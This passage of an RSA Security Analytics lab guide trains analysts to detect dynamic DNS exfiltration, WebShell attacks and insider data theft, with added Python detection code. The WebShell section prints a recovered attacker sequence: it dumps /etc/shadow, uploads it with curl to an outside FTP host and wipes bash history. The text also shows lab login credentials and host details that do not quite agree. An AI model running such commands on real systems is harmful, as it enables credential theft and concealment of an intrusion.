Security Analytics allows for the reporting of all network, log, and net flow and endpoint data from a
single interface. By leveraging a feed of known dynamic DNS top level domains, Security Analytics can
produce a rich report summarizing all activity that has been seen both on the wire (packets) or from
various devices in the network such as proxies and firewalls (logs). In addition to just tagging traffic to
and from dynamic DNS domains, Security Analytics can add valuable business and asset context to
help an analyst sift through the noise. In this sample report, the analyst can see the dynamic DNS traffic
split by asset criticality and function.
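The report described here (and the "What is Dynamic DNS?" and "Detection and Response" sections above) rests on two things: matching observed hostnames against a feed of dynamic DNS provider domains, and enriching the hits with asset context so that uploads from critical servers stand out. The following is an added Python example, not RSA's code, that does both over constructed proxy-log-style records. The feed is a small subset of the providers named in this lab, and the asset list, IP addresses, hostnames and the upload_threshold value are all constructed or assumed.

```python
from collections import Counter

# Constructed feed of dynamic DNS provider domains (a subset of those named in the
# lab text; a real feed would carry hundreds of entries and be refreshed regularly).
DYNDNS_FEED = {
    "no-ip.com", "no-ip.org", "dyndns.org", "changeip.com",
    "duiadns.net", "dynamicdns.org",
}

# Constructed asset context, standing in for the business/asset feed the lab describes.
ASSET_CONTEXT = {
    "10.10.5.20": {"criticality": "High", "function": "Database Server"},
    "10.10.20.15": {"criticality": "Medium", "function": "Workstation"},
}

# Constructed sessions: source IP, contacted hostname and bytes sent outbound.
SAMPLE_SESSIONS = [
    {"src": "10.10.20.15", "host": "www.example.com", "bytes_out": 1200},
    {"src": "10.10.20.15", "host": "myuniquedomainname.no-ip.org", "bytes_out": 800},
    {"src": "10.10.5.20", "host": "asnl2349qpwdan.no-ip.org", "bytes_out": 4_500_000},
    {"src": "10.10.5.20", "host": "updates.vendor.example", "bytes_out": 300},
]


def dyndns_parent(hostname, feed=DYNDNS_FEED):
    """Return the feed entry that hostname falls under, or None.

    Labels are tested right to left, so any subscriber-chosen subdomain such as
    asnl2349qpwdan.no-ip.org matches the provider domain no-ip.org. A bare TLD is
    never tested on its own, so 'org' alone cannot produce a false match.
    """
    labels = hostname.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in feed:
            return candidate
    return None


def tag_sessions(sessions, feed=DYNDNS_FEED, assets=ASSET_CONTEXT,
                 upload_threshold=1_000_000):
    """Keep only sessions to dynamic DNS domains, enriched with asset context.

    upload_threshold (bytes) is an assumed cut-off for calling a session an upload.
    """
    tagged = []
    for s in sessions:
        provider = dyndns_parent(s["host"], feed)
        if provider is None:
            continue
        ctx = assets.get(s["src"], {"criticality": "Unknown", "function": "Unknown"})
        tagged.append({**s, **ctx, "dyndns_provider": provider,
                       "large_upload": s["bytes_out"] >= upload_threshold})
    return tagged


def summarize(tagged):
    """Counts by criticality and function, plus the cases the lab singles out:
    uploads to dynamic DNS domains from High-criticality assets."""
    return {
        "by_criticality": dict(Counter(t["criticality"] for t in tagged)),
        "by_function": dict(Counter(t["function"] for t in tagged)),
        "critical_uploads": [t for t in tagged
                             if t["criticality"] == "High" and t["large_upload"]],
    }


if __name__ == "__main__":
    report = summarize(tag_sessions(SAMPLE_SESSIONS))
    print(report["by_criticality"], report["by_function"])
    for hit in report["critical_uploads"]:
        print("upload from critical asset:", hit["src"], "->", hit["host"])
```

Run on the constructed data, two of the four sessions are tagged (one per host), and only the database server's 4.5 MB transfer to a no-ip.org subdomain lands in critical_uploads, which is the bar the lab drills into. The right-to-left label walk is the important detail: a naive exact match on the hostname would miss every subscriber subdomain.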


4.1 Reports
Choose Reports to examine a report based on the most recently captured data.

4.2 View All Schedules


1. Choose Reports
2. Choose View All Schedules


4.3 Start the Report


1. Choose the Dynamic DNS A... report
2. Click the gear menu and choose Start

4.4 View the Report


1. When the report State is Completed, click View. The report should complete in 5 seconds or
less.
2. If the State does not refresh in a timely manner, force the screen refresh by clicking the arrow at
the bottom of the screen.


4.5 Last Chart in the Report


From this report, the analyst can prioritize and drill in to the most interesting data points to investigate
further. In this particular report, the analyst focuses in on data uploads to dynamic DNS domains from
critical servers (which should never happen in this environment).
1. Use the scroll bar to go to the last chart in the report.
2. Click on the bar
3. Click on Investigate


Step 5 Investigation
Choose the appropriate meta group by
1. Click on the menu next to Profile
2. Choose Use Meta Group
3. Choose DynDNS


5.1 Drill Down


Directly from the report, the analyst can drill down to gain insight into the specific sessions.


Step 6 Reconstructing the Network Session


This looks suspicious enough on its own, but by drilling once more, the analyst can see the
reconstructed network session, and in turn extract any files that had left the environment.
1. Click on the green number next to dynamic dns domain

6.1 View Details


If Detail View is not visible, perform the following actions. Otherwise, continue to step 6.2.
1. Click the menu icon for the item next to Profile.
2. Click Detail View


6.2 View Details


1. Click on View Details


6.3 View the Files


1. Click Best Reconstruction
2. Click View Files


6.4 Files List


This looks suspicious enough on its own, but by drilling once more, the analyst can see the
reconstructed network session, and in turn extract any files that had left the environment.


Step 7 Extract the Archive to see the Business Impact


Going one step further, the analyst can download and extract the archive and see the actual company
information that has left the environment and, understanding the business impact, can now take the
proper steps to handle the incident further.
1. Right-click on M_schematic.png
2. Click Save link as...


7.1 File name


1. Click Save as type: and choose All Files
2. Click Save


7.2 Downloads
Navigate to the Downloads directory
1. Right-click on M-schematic.png.tmp
2. Click Open with...


7.3 Examine the file


Click More options
1. Click Paint
Choose Open when prompted


7.4 Extracted File


Upon extracting the file, it will be possible to see what data was exfiltrated.


Lab 4 - WebShell Attacks - How to Detect and Respond


What is a WebShell?
A WebShell is a piece of code or a script running on a server that enables remote administration. While
often used for legitimate administration purposes, it is also a favorite tactic used by malicious actors in
order to gain remote control of internet facing web servers. Once interaction with a WebShell is
established, an attacker is free to act on any number of objectives such as service disruption, increasing
foothold, and data exfiltration.


A Typical Attack Scenario


A common method of execution for this attack leverages vulnerabilities in a website (e.g. SQL Injection,
Remote File Inclusion) to remotely generate or install a file that will act as a WebShell. Once the
WebShell is successfully installed, the remote attacker may then craft an HTTP POST request directly
to the WebShell with embedded commands that will be executed as if the attacker had local (shell)
access to the web server.

Detection and Response


Attackers that successfully use WebShells take advantage of the fact that many organizations do not
have complete visibility into HTTP sessions. Traditional tools rely on signatures and are easily left blind
by intentional obfuscation of payloads and commands. In order to respond effectively to WebShell
attacks, defenders must maximize visibility into each stage of the attack lifecycle. The following chart
contrasts the visibility by attack stage into an attacker's tools, tactics, and procedures (TTPs) provided
by traditional tools with that provided by RSA Security Analytics.


Without being able to reconstruct the entire HTTP session (request and response), traditional toolsets
do not allow an investigator to see into enough of the attack lifecycle to understand the initial attack
vector (Delivery, Exploit/Installation), what an attacker is doing (C2), and what the impact to the
business is (Action). For example, a traditional logs-only SIEM has no way to alert on suspicious HTTP
sessions of this nature unless a downstream signature-based tool such as an IDS/IPS or web proxy has
seen the exact attack before. Furthermore, HTTP sessions cannot be reconstructed with log data alone,
meaning a complete lack of visibility into C2 commands, data exfiltration, and initial entry vector.

Step 1 Connect to the Launchpad machine


Upon login, the launchpad will connect with the appropriate credentials.

Step 2 Data Capture


To capture fresh data, first double-click on the mRemoteNG icon on the desktop.


2.1 Open the Console


Open the sahybrid console by double-clicking on sahybrid in the list of connections.

2.2 Open the command file on the desktop


Right-click on the Data Generation icon on the desktop and choose Open.


2.3 Copy the command from the Desktop file


Highlight the command line under Web Shell Demo and choose Copy or Ctrl+C


2.4 Paste the command in the Console


1. Paste the command into the console and press enter.
2. The command will begin to run.
3. Wait for it to complete

Step 3 Connect to the Security Analytics User Interface


Click on the Firefox or Chrome icon on the taskbar. It will automatically connect to
https://sa.vlab.local/login as the home page. If it does not, choose the RSA Security Analytics
bookmark from the toolbar.


3.1 Warning screen for Chrome


If Chrome is chosen, the "Your connection is not private" warning may be displayed.
Click Advanced.


3.2 Bypassing the warning screen for Chrome


Click Proceed to sa.vlab.local (unsafe)


3.3 Enter the user credentials


Username = admin
Password = Password123!

Step 4 WebShell Visibility with RSA Security Analytics for Packets


Detecting possible WebShell activity involves understanding what an HTTP session with an embedded
command typically looks like. There are a few notable features often seen with this attack:
1. A request sent directly to a web server with the HTTP POST method, so that the data is sent
without placing commands in the URL string. This ensures typical web access logs do not
include the command (versus HTTP GET, which would include the commands within the URL).
2. No HTTP GET will have been seen before the POST (normal human-driven web traffic would
show a GET before a POST is issued).
3. (Usually) no Referer header, since the request is sent directly to the server and is not the result
of click-through browsing.
4. The posted data includes obfuscated shell commands to be executed by the WebShell.
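The four features listed in Step 4 can be scored mechanically over reconstructed HTTP sessions. The following is an added Python example, not the product's rule logic, that walks constructed session records in time order and reports a POST when at least two of the features apply: no earlier GET from the same source, no Referer header, and a body whose parameter values look like a shell command (a shell-ish pattern or a long base64-looking token). The session records, IP addresses, regular expressions and the two-feature threshold are all constructed or assumed.

```python
import re
from urllib.parse import parse_qs

# Constructed HTTP session records (not from the lab capture). A normal user browses
# and logs in; a second source posts straight to a script with a command-like body,
# mirroring the default.php?q=... session the lab reconstructs.
SAMPLE_HTTP = [
    {"ts": 1, "src": "10.10.20.22", "method": "GET", "path": "/index.php",
     "referer": None, "body": ""},
    {"ts": 2, "src": "10.10.20.22", "method": "GET", "path": "/login.php",
     "referer": "http://www.vlab.local/index.php", "body": ""},
    {"ts": 3, "src": "10.10.20.22", "method": "POST", "path": "/login.php",
     "referer": "http://www.vlab.local/login.php", "body": "user=alice&pw=secret"},
    {"ts": 4, "src": "203.0.113.77", "method": "POST", "path": "/default.php",
     "referer": None, "body": "q=cat+/etc/passwd"},
]

# Assumed indicators of a command hidden in a form value: well-known system paths,
# common command names, shell separators, or a long base64-looking token.
SHELLISH = re.compile(r"(/etc/|/bin/|/dev/|\bcat\b|\bwhoami\b|\bcurl\b|\brm\b|[;|])")
B64_RUN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def looks_like_command(body):
    """True if any form value in an application/x-www-form-urlencoded body looks like
    a shell command or an obfuscated (base64-like) blob."""
    for values in parse_qs(body).values():
        for value in values:
            if SHELLISH.search(value) or B64_RUN.match(value):
                return True
    return False


def score_sessions(sessions, min_reasons=2):
    """Return the POSTs that exhibit at least min_reasons WebShell features.

    Sessions are processed in timestamp order so that 'no prior GET' means no GET
    from the same source IP earlier in the window.
    """
    sources_with_get = set()
    findings = []
    for s in sorted(sessions, key=lambda x: x["ts"]):
        if s["method"] == "GET":
            sources_with_get.add(s["src"])
            continue
        if s["method"] != "POST":
            continue
        reasons = []
        if s["src"] not in sources_with_get:
            reasons.append("no prior GET from source")
        if not s.get("referer"):
            reasons.append("no Referer header")
        if looks_like_command(s["body"]):
            reasons.append("posted data looks like a shell command")
        if len(reasons) >= min_reasons:
            findings.append({"src": s["src"], "path": s["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in score_sessions(SAMPLE_HTTP):
        print(f"possible webshell: {f['src']} POST {f['path']} ({', '.join(f['reasons'])})")
```

On the constructed data the login POST scores zero (a GET preceded it, it carries a Referer, and its values are benign), while the direct POST to default.php scores all three. A production rule would track the prior GET per source and destination host rather than per source alone, and would treat the command pattern as one signal among several, since a single-feature match on a legitimate API client is common.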


5.1 Investigation
1. Click Investigation
2. Click Navigate

5.2 Choose the Meta Group


Choose the appropriate meta group by
1. Click on the menu next to Profile
2. Choose Use Meta Group
3. Choose L2_Analyst


5.3 Load Values


1. Click Load Values

5.4 Remove Visualization


If Visualization is displayed, remove it. Otherwise, continue with step 5.5.
1. Click Hide


5.5 Drill Down


By reconstructing the entire HTTP session upon capture and immediately generating and extracting rich
metadata, RSA Security Analytics makes it simple to alert on the features indicative of a WebShell
1. Click on the green number next to http post no get no referrer - possible webshell

Step 6 Investigate Sessions


1. Click on the menu to the left of Actions (Detail View)
2. Click on Custom Column Groups
3. Click on WebShellDemo


6.1 WebShell Sessions Detail


Once suspicious sessions are tagged, the analyst can open up the actual HTTP session(s) for deeper
inspection and quickly see all sessions exhibiting WebShell behavior:
1. Double-click the first event with Source IP Address 67.202.59.203 and Destination IP of
192.168.1.55

Step 7 Reconstructing the Raw Contents of the First Event


1. Click on the drop down icon next to Top to Bottom
2. Click on Side by Side


7.1 View Text


1. Click on the drop down icon next to Best Reconstruction
2. Click on View Text


7.2 View the Event Reconstruction


By clicking on each session, the analyst can dig deeper and reconstruct the raw contents. The first
session shows an HTTP POST request to default.php setting the variable q to a value of cat /etc/
passwd. The subsequent response from the HTTP server has actually returned the results of that
command, executed on the local system, to the attacker's browser, displaying the raw contents of /etc/
passwd, the list of users on the system!
1. Click the X in the upper right hand corner to close the Event Reconstruction window.

Step 8 Reconstructing the Raw Contents of the Second Event


By iterating through and viewing each of the sessions, the analyst quickly discovers the entire command
sequence sent to the WebShell by the attacker.


1. Double-click the second event with Source IP Address 67.202.59.203 and Destination IP of
192.168.1.55

8.1 View Text


1. Click on the drop down icon next to Best Reconstruction
2. Click on View Text

8.2 View the Files


This quick reconstruction shows the following commands executed in sequence:
cat /etc/shadow > shadow.txt
sudo zip --password Password!1 loot.zip shadow.txt loot.txt
rm shadow.txt
rm passwd.txt
curl -T loot.zip ftp://169.122.8.212 --user chuck:Norris
rm loot.zip
cat /dev/null > ~/.bash_history
Full session visibility has shown the analyst that the attacker copied the contents of /etc/shadow
(encrypted passwords for all local users of the system) along with another text file into an encrypted
archive (loot.zip), proceeded to upload the small file to a host listening on 169.122.8.212 over port 80,
and finally attempted to cover their tracks by removing all files and clearing the command history. A
brute force attack could be used to extract credentials that could then be used to continue the attack,
gaining a stronger foothold in the environment through lateral movement.
1. Click the X in the upper right hand corner to close the Event Reconstruction window.


Step 9 Focusing the Investigation on the External Drop Zone


Continuing the investigation, the analyst can re-focus on the external drop zone at 67.202.59.203. A
quick query into RSA Security Analytics reveals the FTP session the analyst saw evidence of in the
WebShell commands.
1. Click the menu icon next to alert = 'http post no get no referrer...'


2. Click Remove

9.1 Request All Activities Involving a Destination of 67.202.59.203


1. Click Query
2. Enter ip.dst in the first text box (Select Meta)
3. Choose = for the second text box (Operator)
4. Type 67.202.59.203 in the third text box (Value)
5. Click Apply

9.2 Events Related to the Drop Zone


RSA Security Analytics detects this as an FTP session regardless of any special ports used by an
attacker to help evade detection.


1. Double-click on the event with Network Protocol FTP

Step 10 Reconstructed FTP Session Between Victim Server and Drop Zone


1. Click on Best Reconstruction
2. Click on View Text


10.1 Extracting loot.zip


Drilling in further, it is possible for the analyst to confirm the data exfiltration by extracting the actual
archive, and decrypting it with the password that was learned earlier on in the investigation, gaining
insight into the potential impact to the business.
1. Click the X in the upper right hand corner to close the Event Reconstruction window.


Step 11 Understanding How the WebShell was Installed


Finally, the analyst can rewind the events in order to try and understand how the WebShell was installed
in the first place. By looking at all traffic originating from the attacker's IP address prior to the detected
WebShell activity, the analyst can reconstruct and see the initial SQL injection attack that resulted in the
upload of the shell to the web server.


1. Click the menu icon next to ip.dst=67.202.59.203
2. Click Edit

11.1 Modifying the Query to Request HTTP Sessions Originating from the Attacker IP Address Prior to the Alert
1. Change ip.dst to ip.src
2. Click OK


11.2 All Events Involving a Source of 67.202.59.203


1. Double-click on the event that has the querystring

11.3 Reconstructing the Raw Contents of the First Event


1. Click on the drop down icon next to Side by Side
2. Click on Top to Bottom


11.4 View Text


1. Click on the drop down icon next to Best Reconstruction
2. Click on View Text


11.5 Examine the Querystring of the Event


Opening up the session reveals SQL commands within the querystring of the HTTP GET session that
resulted in data (the WebShell) being copied to the web server. The analyst now has all the details they
need to understand the incident, the potential impact to the business, and the root cause for tightening
up defenses in the future.


Lab 5 - Malicious Insider - How to Detect and Respond


Who is a Malicious Insider?
An organization has to protect its assets not only from external threat actors but also from malicious
insiders who may benefit from exfiltrating intellectual property or other sensitive data out of the company
they work for.
Malicious insider activity is often different from that of external attackers, since insiders already have a foothold
in the organization and often already have privileged access to the company's resources.


A Typical Attack Scenario


A motivated and intelligent insider such as a rogue administrator may attempt to exfiltrate data stealthily
by first transferring data to a part of the environment accessible from outside the organization and then
downloading it from the public internet disguised as a regular website visitor. This avoids the risk of
detection of a large external file upload (e.g. to Dropbox).
The insider may first leverage their existing privileges to collect sensitive data locally or from the
organization's cloud infrastructure, then transfer it to a part of the environment accessible
from the internet, such as a web server. To prevent abuse of privileges, organizations usually implement
processes and procedures which require users to submit change requests that have to be approved
before performing any critical action or change to the production environment, which of course the
insider must circumvent in this scenario.


Detection and Response


Malicious insiders usually take advantage of the fact that many organizations, despite the number of
security controls in place, do not have enough visibility into the transfer of information within the
organization, and lack the context required to distinguish between legitimate and malicious activities.
Most of the traditional detection tools that rely on signatures also assume that a privileged user has to be
implicitly trusted. Being constantly overwhelmed by large volumes of security data, organizations are
often unable to take advantage of the processes already in place that are designed to prevent this kind
of malicious activity, and to link those processes with the gathered data (e.g. checking whether a change request has been
submitted and approved before allowing a potentially critical action such as a file transfer or software
installation).
In order to prevent this and other similar scenarios, defenders must maximize visibility into each stage
of the attack lifecycle. The following chart contrasts the visibility by attack stage into an attacker's tools,
tactics, and procedures (TTPs) provided by traditional tools versus RSA Security Analytics.
Without being able to collect information from different sources and reconstruct the entire
communication (request and response), traditional toolsets prevent an investigator not only from identifying the
malicious insider, but also from reconstructing the different steps required to understand the initial attack
vector (Reconnaissance), what an attacker is doing (Exploit/Installation), and what the impact to the
business is (Action). For example, a traditional logs-only SIEM has no way to reconstruct the
communication between the attacker and the critical web server and to link it with the exfiltration phase
that follows just after, all of this correlated with the business context and the existing IT processes.


Step 1 Connect to the Launchpad machine


Upon login, the launchpad will connect with the appropriate credentials.

Step 2 Data Capture


To capture fresh data, first double-click on the mRemoteNG icon on the desktop.

2.1 Open the Console


Open the sahybrid console by double-clicking on sahybrid in the list of connections.


2.2 Open the command file on the desktop


Right-click on the Data Generation icon on the desktop and choose Open.

2.3 Copy the command from the Desktop file


Highlight the command line under Malicious Insider and choose Copy or Ctrl+C


2.4 Paste the command in the Console


1. Paste the command into the console and press enter.
2. The command will begin to run.
3. Wait for it to complete

Step 3 Connect to the Security Analytics User Interface


Click on the Firefox or Chrome icon on the taskbar. It will automatically connect to
https://sa.vlab.local/login as the home page. If it does not, choose the RSA Security Analytics
bookmark from the toolbar.

3.1 Warning screen for Chrome


If Chrome is chosen, the Your connection is not private warning may be displayed. If it is,
click Advanced.

3.2 Bypassing the warning screen for Chrome


Click Proceed to sa.vlab.local (unsafe)

3.3 Enter the user credentials


Username = admin
Password = Password123!

Step 4 Alerting Module


Key solution: RSA Security Analytics for Packets, RSA Security Analytics for Logs
RSA Security Analytics allows real-time correlation of logs, NetFlow, full packet capture and endpoint
events. As data is captured by the platform, significant metadata is extracted and alerts are generated
based on specific patterns that model anomalous or potentially malicious scenarios.
The network traffic collected at designated capture points tells the platform and its users exactly what
an insider is transferring around the organization, regardless of user privileges. Log data can be used
to keep track of the change request workflow, allowing the correlation module of Security Analytics to
detect activities for which a change request has been neither submitted nor approved. Additionally,
enriching this data with business context helps the analyst prioritize actions, since high severity alerts
will trigger only if a critical server has been involved.

4.1 Alerts
By accessing the alerting module of Security Analytics, an analyst is notified about a critical event that
has just happened. The rule behind this alert specifically looks for a user who uploaded a file via
FTP to a critical server exposed to the Internet without submitting a change request first, which is in
effect an internal policy violation. However, the alert has an elevated severity because it also involves
the same file being downloaded by an external website visitor shortly after.
1. Click Alerts
2. Click Summary

4.2 Drill to Investigation


1. Double-click on Upload without change request followed by download

4.3 Drill to Investigation (continued)


1. Double-click on Upload without change request followed by download

2. Double-click on the event containing the Source 192.168.0.7

Step 5 Investigation
Choose the appropriate meta group by
1. Click on the menu next to Profile

2. Choose Use Meta Group


3. Choose Malicious_Insider

5.1 Drill Down


Once the analyst has reviewed the alert and determined that a follow-up investigation is required, they
may simply click on any metadata presented on the screen (e.g. the IP source of the user who uploaded
the file) to access the investigation module, exposing all log events and network traffic originating from
the user's IP address within that timeframe.
The screen shows a few risk indicators (e.g. a critical server is involved, the user is an administrator
and an encrypted archive has been transferred) as well as network traffic details (e.g. the FTP protocol
was used and the user mburns uploaded a file called CAD.zip). All of this data is summarized in a
single screen.

Step 6 Reconstructing the Network Session


This looks suspicious enough on its own, but by drilling once more, the analyst can see the
reconstructed network session, and in turn extract any files that had left the environment.

1. Click on the (1) next to cad.zip

6.1 Detail View


1. Click on the menu to the left of Actions
2. Choose Detail View

6.2 View Details


1. Click on View Details

6.3 View the Files


For the analyst to confirm the actual criticality of the incident, the communication can be
reconstructed and the files can be extracted from the FTP session to verify the sensitivity of the
content.
1. Click Best Reconstruction to see the reconstruction of the communication
By extracting the files from the session, the analyst is able to see that the content of the zip file is
53_bevel_gear_support_exercise.jpg.

Step 7 Broadening the Timeframe


Click the X in the upper right hand corner to close the Event Reconstruction window
1. Click Navigate From Here in the drop down list for ip.src='192.168.0.7'

7.1 Change Time Frame


1. Click Custom
2. Click All Data

7.2 Combine Network Traffic and Logs into a Single View


By applying the same approach, the analyst can now gather additional information by broadening the
timeframe and looking for all the activities just before and after the event involving that specific user or
IP source.
The analyst may notice that the user under investigation has performed a number of actions on different
systems, accessing multiple resources (with legitimate credentials, since the user is an admin), both
locally and in the cloud.

Step 8 Leveraging the Metadata Framework


1. Click on the icon for the drop-down menu for ip.src
2. Click Remove

8.1 Request All Activities Involving the cad.zip File


1. Scroll down and click on cad.zip under Filename

8.2 Data Visualization


1. Click Visualization

8.3 Request All Activities Involving the cad.zip File


The metadata framework within Security Analytics can be leveraged to submit queries that combine
any of the metadata present. For example, an analyst can now pivot and request details on all the
activities involving a file named CAD.zip, which was the archive the insider uploaded to the web server.
The screen shows some HTTP activity in addition to the FTP session already investigated by the analyst.
This is expected, given that the alert condition presumes the file was downloaded from the public side
of the web server right after it was transferred there. Other risk indicators highlight further anomalies
in this request: for example, it is a direct HTTP request without a referrer, which indicates that the
user who downloaded the file knew its location in advance without browsing the website. That is also
anomalous.
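One way to model the correlation behind the Step 4 alert together with the risk indicators from this pivot, as an added Python example that is neither RSA code nor Security Analytics rule syntax: an FTP upload with no prior approved change request raises an alert, and a download of the same file from the same server shortly afterwards escalates it. The critical server list, the time window and the metadata records are all constructed for the example.

```python
from datetime import datetime, timedelta

# Constructed (not from the lab): the Internet-facing server treated as critical,
# and how soon a download must follow the upload to chain the two events.
CRITICAL_SERVERS = {"192.168.0.10"}
WINDOW = timedelta(minutes=30)

# Constructed metadata records in the shape the lab screens describe. The only
# change request covers a different host, so the CAD.zip upload has no approval.
EVENTS = [
    {"time": "2015-11-10 09:58:00", "type": "change_request", "user": "mburns",
     "host": "192.168.0.20", "status": "approved"},
    {"time": "2015-11-10 10:01:00", "type": "ftp_upload", "user": "mburns",
     "ip_src": "192.168.0.7", "host": "192.168.0.10", "filename": "CAD.zip"},
    {"time": "2015-11-10 10:04:00", "type": "http_get", "ip_src": "203.0.113.5",
     "host": "192.168.0.10", "filename": "cad.zip", "referer": ""},
]

def ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")

def has_change_request(upload, events):
    """True if an approved request for the same user and host predates the upload."""
    return any(e["type"] == "change_request" and e["status"] == "approved"
               and e["user"] == upload["user"] and e["host"] == upload["host"]
               and ts(e) <= ts(upload) for e in events)

def correlate(events):
    """One alert per FTP upload lacking a change request; escalated when the same
    file is fetched from that server within WINDOW. The filename match is
    case-insensitive because the lab shows both cad.zip and CAD.zip."""
    alerts = []
    for up in (e for e in events if e["type"] == "ftp_upload"):
        if has_change_request(up, events):
            continue
        alert = {"rule": "upload without change request", "user": up["user"],
                 "filename": up["filename"], "severity": "medium", "indicators": []}
        if up["host"] in CRITICAL_SERVERS:
            alert["indicators"].append("critical server")
        for dl in (e for e in events if e["type"] == "http_get"):
            if (dl["host"] == up["host"] and dl["filename"].lower() == up["filename"].lower()
                    and ts(up) < ts(dl) <= ts(up) + WINDOW):
                alert["rule"] += " followed by download"
                alert["indicators"].append("downloaded by " + dl["ip_src"])
                if not dl.get("referer"):  # direct request: the site was not browsed first
                    alert["indicators"].append("direct request without referrer")
                break
        if "critical server" in alert["indicators"] and alert["rule"].endswith("download"):
            alert["severity"] = "high"  # only a critical server raises severity, as the lab states
        alerts.append(alert)
    return alerts
```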

Step 9 Reconstructing the Network Session


The analyst can then reconstruct this network session and verify that the remote user successfully
downloaded the file.
1. Click on the (1) next to HTTP

9.1 View Details


1. Click on View Details

9.2 View Text


1. Click on Best Reconstruction
2. Click on View Text

9.3 Confirmation of Data Exfiltration


By conducting this quick and simple investigation, the analyst has confirmed that a data exfiltration has
taken place and can perform any follow-up action that is required, having collected a large amount of
evidence against the administrator. RSA Security Analytics was able to automate the detection process
by alerting the analyst in real time to an anomalous activity, thanks to its pervasive visibility combined
with the business and IT context of all related systems.

Troubleshooting

General Troubleshooting and Tips

RSA Security Analytics Troubleshooting & Tips


No Data Appears in the Investigation Window
If no data appears in the investigation window, first ensure that the Load Values button has been
clicked.

Check the Date Range


If no data appears once the Load Values button has been clicked, check the date range to ensure that
data has been captured in that time frame.

Modify the Date Range


1. Choose the date range from the drop-down menu. All Data will show all data ever loaded into the
system.
2. Click the refresh button to see the data in that time range.

Conclusion

Conclusion
RSA Security Analytics offers organizations a unified platform for incident detection, investigations, and
advanced security analysis. This will allow their highly skilled security personnel to be more efficient
and less skilled security personnel to be more effective.
